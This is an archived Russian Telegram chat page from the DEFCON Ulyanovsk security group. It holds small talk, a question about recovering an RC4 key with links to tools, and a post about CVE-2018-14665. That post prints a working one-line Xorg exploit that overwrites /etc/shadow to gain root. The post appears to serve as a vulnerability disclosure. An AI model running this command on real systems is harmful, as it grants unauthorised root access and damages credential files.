В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

DC20e6: DEFCON Ульяновск

262 membersпожаловаться на группу
2018 October 25

TK

Tagir Kh. in DC20e6: DEFCON Ульяновск
Закончим день хорошей новостью: анонимус доказал новую нижную оценку длины строки, включающей в себя все перестановки N элементов (superpermutation). Копия оригинального треда с 4chan, пересказ в fandom wiki /sci, более формальный пересказ в почтовой рассылке и наконец аккуратная pdf от Jay Pantone.

Друзья подсказывают, что это просто Перельману надоело лишнее внимание и топология (а ещё он, судя по всему, любит аниме).
источник
09:54пожаловаться#1

R

RusEm in DC20e6: DEFCON Ульяновск
Доброе утро. Спрошу ещё тут.
источник
10:43пожаловаться#2

R

RusEm in DC20e6: DEFCON Ульяновск
Никто не подскажет тулзу для Брута ключа RC4  на основе пары plaintext->chipertext
источник
10:44пожаловаться#3

R

RusEm in DC20e6: DEFCON Ульяновск
Ну или восстановление rc4 key  из  keystream
источник
10:45пожаловаться#4

F

Fred in DC20e6: DEFCON Ульяновск
я опять жеж хз но может оно https://gist.github.com/cosu/4017169
Gist
Educational tool to bruteforce RC4 encrypted files.
Educational tool to bruteforce RC4 encrypted files. - rc4brute.py
источник
10:55пожаловаться#5

R

RusEm in DC20e6: DEFCON Ульяновск
Где то я это уже видел. Возможно даже сегодня)
источник
10:57пожаловаться#6

F

Fred in DC20e6: DEFCON Ульяновск
https://blog.didierstevens.com/2016/01/01/xor-known-plaintext-attack/
Didier Stevens
XOR Known-Plaintext Attack
To celebrate my Microsoft MVP award 2016, I’m releasing a new XOR-tool. Because you can never have enough XOR-tools in your toolbox :-). When data is XOR-encrypted with a repeating key and yo…
источник
10:58пожаловаться#7

F

Fred in DC20e6: DEFCON Ульяновск
еще что-то
источник
10:58пожаловаться#8

R

RusEm in DC20e6: DEFCON Ульяновск
Спасибо попробую. Но конечно странно что они юзают энтропию
источник
10:58пожаловаться#9

F

Fred in DC20e6: DEFCON Ульяновск
я не очень понимаю всю эту криптографию, но может я умею хорошо гуглить
источник
10:59пожаловаться#10

F

Fred in DC20e6: DEFCON Ульяновск
:D
источник
10:59пожаловаться#11

R

RusEm in DC20e6: DEFCON Ульяновск
Fred
https://blog.didierstevens.com/2016/01/01/xor-known-plaintext-attack/
Didier Stevens
XOR Known-Plaintext Attack
To celebrate my Microsoft MVP award 2016, I’m releasing a new XOR-tool. Because you can never have enough XOR-tools in your toolbox :-). When data is XOR-encrypted with a repeating key and yo…
Ну тут я понимаю xor tool. Это я и ручками могу keystream вытащить. Вопрос именно в получении ключа а не keystream
источник
10:59пожаловаться#12

R

RusEm in DC20e6: DEFCON Ульяновск
Но все равно спасибо)
источник
10:59пожаловаться#13

R

RusEm in DC20e6: DEFCON Ульяновск
Fred
я не очень понимаю всю эту криптографию, но может я умею хорошо гуглить
А я не очень понимаю в этих ваших гитах)
источник
10:59пожаловаться#14

F

Fred in DC20e6: DEFCON Ульяновск
RusEm
А я не очень понимаю в этих ваших гитах)
ну зато у тебя навыки реверса есть, это круто, меня даже не хватило крякнуть одну игрушку ради акдемического удовольствия, кряков в интернете полно, так и забил
источник
11:03пожаловаться#15

R

RusEm in DC20e6: DEFCON Ульяновск
Дык тут самое главное усидчивость. Реально порой можно убить пару часов чтобы понять что функция просто извлекает корень из 64битного числа
источник
11:04пожаловаться#16

SN

Sergey Neklyudov in DC20e6: DEFCON Ульяновск
RusEm
Дык тут самое главное усидчивость. Реально порой можно убить пару часов чтобы понять что функция просто извлекает корень из 64битного числа
Не в самом худшем случае я скажу
источник
17:27пожаловаться#17
2018 October 26

DM

Denis Morozov in DC20e6: DEFCON Ульяновск
Народ всем привет. Спрошу тут еще. Есть кто с Asterisk работает вплотную. Есть задачка.
источник
09:38пожаловаться#18

DM

Denis Morozov in DC20e6: DEFCON Ульяновск
Все вопросы в личку.
источник
09:39пожаловаться#19

R

Roman in DC20e6: DEFCON Ульяновск
Обнаруженная уязвимость CVE-2018-14665 затрагивает OpenBSD и большинство дистрибутивов Linux (включая Debian, Ubuntu, Red Hat, Fedora), и выглядит так:

cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su

Эта уязвимость позволяет злоумышленникам с ограниченным доступом к системе (Например, через сессию SSH) повысить свои привилегии до уровня root.

Больше информации об уязвимости тут:
https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
и тут
https://lists.x.org/archives/xorg-announce/2018-October/002927.html

У OpenBSD уже есть фикс, для ваших любимых дистрибутивов линуксов следите за апдейтами у вендоров.
cve.mitre.org
CVE -
CVE-2018-14665
Common Vulnerabilities and Exposures (CVE®) is a list of entries — each containing an identification number, a description, and at least one public reference — for publicly known cybersecurity vulnerabilities. Assigned by CVE Numbering Authorities (CNAs) from around the world, use of CVE Entries ensures confidence among parties when used to discuss or share information about a unique software vulnerability, provides a baseline for tool evaluation, and enables data exchange for cybersecurity automation.
источник
21:25пожаловаться#20